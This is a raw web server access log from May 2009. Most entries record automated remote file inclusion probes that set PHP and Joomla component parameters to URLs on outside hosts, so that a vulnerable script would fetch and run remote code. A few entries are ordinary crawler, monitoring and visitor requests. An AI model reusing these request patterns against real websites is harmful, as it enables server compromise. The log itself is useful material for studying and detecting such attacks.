79.18.233.198 - - [31/May/2009:09:20:36 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
69.94.125.100 - - [31/May/2009:09:20:58 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:20:58 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:20:58 -0400] "GET //skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:09:21:38 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:21:47 -0400] "GET /logs/access_log.Q108112300%20%20//skin/zero_vote/error.php?dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.234.23.44 - - [31/May/2009:09:21:57 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
79.18.233.198 - - [31/May/2009:09:22:07 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
209.59.12.99 - - [31/May/2009:09:22:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.16 - - [31/May/2009:09:23:35 -0400] "GET /images/download_credit_lg.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
112.175.141.41 - - [31/May/2009:09:25:49 -0400] "GET /logs/access_log.Q109031800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:09:26:09 -0400] "GET /logs/access_log.Q108081500%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:09:26:16 -0400] "GET //?_zb_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:09:26:16 -0400] "GET /logs/error_log.Q108033000//?_zb_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:09:26:18 -0400] "GET /logs//?_zb_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:27:02 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:27:02 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:27:04 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:27:04 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:27:04 -0400] "GET /logs/access_log.Q109052100//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:09:27:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.194.204.129 - - [31/May/2009:09:27:07 -0400] "GET /logs/access_log.Q109052100%20%20//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:27:19 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:27:19 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:27:19 -0400] "GET /logs/access_log.Q109050900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:27:19 -0400] "GET /logs/access_log.Q109052200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
74.6.8.108 - - [31/May/2009:09:27:28 -0400] "GET /logs/access_log.Q107100200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.194.204.129 - - [31/May/2009:09:28:01 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:28:02 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:28:02 -0400] "GET /logs/access_log.Q109052100//bemarket/postscript/postscript.php?p_mode=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:09:28:28 -0400] "GET //?_zb_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:09:28:29 -0400] "GET /logs//?_zb_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
89.223.3.98 - - [31/May/2009:09:28:31 -0400] "GET /logs/error_log.Q108033000//?_zb_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:09:29:24 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:09:29:24 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.0.141.241 - - [31/May/2009:09:29:25 -0400] "GET //modules/xfsection/modify.php?dir_module=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.193.49.234 - - [31/May/2009:09:30:07 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
81.193.49.234 - - [31/May/2009:09:30:07 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
81.193.49.234 - - [31/May/2009:09:30:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
81.193.49.234 - - [31/May/2009:09:30:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
218.234.23.44 - - [31/May/2009:09:30:30 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 200 3568 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
121.0.141.241 - - [31/May/2009:09:30:32 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
79.18.233.198 - - [31/May/2009:09:31:36 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:09:31:38 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:09:31:39 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
85.18.117.101 - - [31/May/2009:09:31:56 -0400] "GET /logs/access_log.Q109051800%20%20//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:09:32:05 -0400] "GET /logs/access_log.Q109052300%20%20//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:09:32:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [31/May/2009:09:32:16 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
217.147.29.190 - - [31/May/2009:09:32:17 -0400] "GET //skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.808"
217.147.29.190 - - [31/May/2009:09:32:17 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
69.94.125.100 - - [31/May/2009:09:33:24 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:33:24 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:33:24 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.246.20.221 - - [31/May/2009:09:33:57 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
79.18.233.198 - - [31/May/2009:09:33:58 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
72.32.68.153 - - [31/May/2009:09:33:59 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/p2000.do?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
72.32.68.153 - - [31/May/2009:09:33:59 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/p2000.do?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
79.18.233.198 - - [31/May/2009:09:34:00 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:09:34:01 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
79.18.233.198 - - [31/May/2009:09:34:56 -0400] "GET /logs/error_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
85.18.117.101 - - [31/May/2009:09:35:07 -0400] "GET /logs/access_log.Q109051800%20%20//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:35:08 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:09:35:16 -0400] "GET /logs/access_log.Q109052300%20%20//?_zb_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
79.18.233.198 - - [31/May/2009:09:36:05 -0400] "GET /logs/error_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
209.200.8.89 - - [31/May/2009:09:36:26 -0400] "GET //index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.200.8.89 - - [31/May/2009:09:36:26 -0400] "GET /logs//index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.18.233.198 - - [31/May/2009:09:36:37 -0400] "GET /logs/error_log.Q109052000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [31/May/2009:09:37:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.18.233.198 - - [31/May/2009:09:37:27 -0400] "GET /logs/error_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
207.182.137.218 - - [31/May/2009:09:37:40 -0400] "GET /logs/access_log.Q109051100//?_zb_path=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
207.182.137.218 - - [31/May/2009:09:37:40 -0400] "GET //?_zb_path=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
207.182.137.218 - - [31/May/2009:09:37:40 -0400] "GET /logs//?_zb_path=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:09:38:07 -0400] "GET /logs/access_log.Q109052200//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.142.148.142 - - [31/May/2009:09:38:07 -0400] "GET /logs//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:09:38:17 -0400] "GET /logs//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:09:38:31 -0400] "GET /logs/access_log.Q109052200//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
207.182.137.218 - - [31/May/2009:09:38:42 -0400] "GET //?_zb_path=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
207.182.137.218 - - [31/May/2009:09:38:42 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.182.137.218 - - [31/May/2009:09:38:42 -0400] "GET /logs//?_zb_path=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
209.200.8.89 - - [31/May/2009:09:38:52 -0400] "GET //index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.200.8.89 - - [31/May/2009:09:38:52 -0400] "GET /logs//index.php?option=com_mambatstaff<emid=&mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:09:39:50 -0400] "GET /logs//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:09:39:50 -0400] "GET //tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:09:39:50 -0400] "GET /logs/access_log.Q109052200//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.32.68.153 - - [31/May/2009:09:39:51 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/p2000.do?? HTTP/1.1" 404 232 "-" "Avant Browser (http://www.avantbrowser.com)"
72.32.68.153 - - [31/May/2009:09:39:51 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/p2000.do?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
217.147.29.190 - - [31/May/2009:09:40:03 -0400] "GET /errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:40:03 -0400] "GET /logs/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:09:40:27 -0400] "GET /logs/access_log.Q109052200%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:09:41:04 -0400] "GET /logs/error_log.Q109052200%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:41:12 -0400] "GET //search?q=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:41:12 -0400] "GET /logs//search?q=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:41:12 -0400] "GET /logs/access_log.Q109052200//search?q=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
62.146.68.61 - - [31/May/2009:09:41:12 -0400] "GET /logs/access_log.Q109051600//search?q=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.94.125.100 - - [31/May/2009:09:41:23 -0400] "GET /logs/access_log.Q109052100//modules/TotalCalendar/about.php?inc_dir=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:41:29 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:41:31 -0400] "GET /errors.php?error=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:09:41:34 -0400] "GET /logs/access_log.Q109052200%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:09:42:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.142.148.142 - - [31/May/2009:09:42:52 -0400] "GET /logs/access_log.Q109052200%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.6.8.108 - - [31/May/2009:09:43:44 -0400] "GET /logs/error_log.Q108121500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.249.36.194 - - [31/May/2009:09:44:18 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:09:44:18 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:09:44:18 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:09:44:22 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:09:44:22 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:09:44:22 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:44:26 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:44:26 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:45:13 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
217.147.29.190 - - [31/May/2009:09:45:16 -0400] "GET //login.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
217.147.29.190 - - [31/May/2009:09:45:16 -0400] "GET /logs//login.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
112.175.141.41 - - [31/May/2009:09:45:39 -0400] "GET /logs/access_log.Q109051500//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
71.132.137.190 - - [31/May/2009:09:45:51 -0400] "GET /logs/access_log.Q108100300 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.208.111.178 - - [31/May/2009:09:46:28 -0400] "GET //main.php?sayfa=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:09:46:28 -0400] "GET /logs//main.php?sayfa=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:09:46:28 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:09:46:30 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:46:38 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:09:46:38 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:09:47:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [31/May/2009:09:47:10 -0400] "GET /logs/access_log.Q108112300//skin/zero_vote/error.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
74.208.111.178 - - [31/May/2009:09:47:12 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.208.111.178 - - [31/May/2009:09:47:12 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:09:47:13 -0400] "GET /logs/access_log.Q109050300//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:09:47:28 -0400] "GET /logs/access_log.Q109052300//login.php?dir=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
200.142.148.142 - - [31/May/2009:09:47:35 -0400] "GET /logs/error_log.Q109052200%20%20//tools/send_reminders.php?includedir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
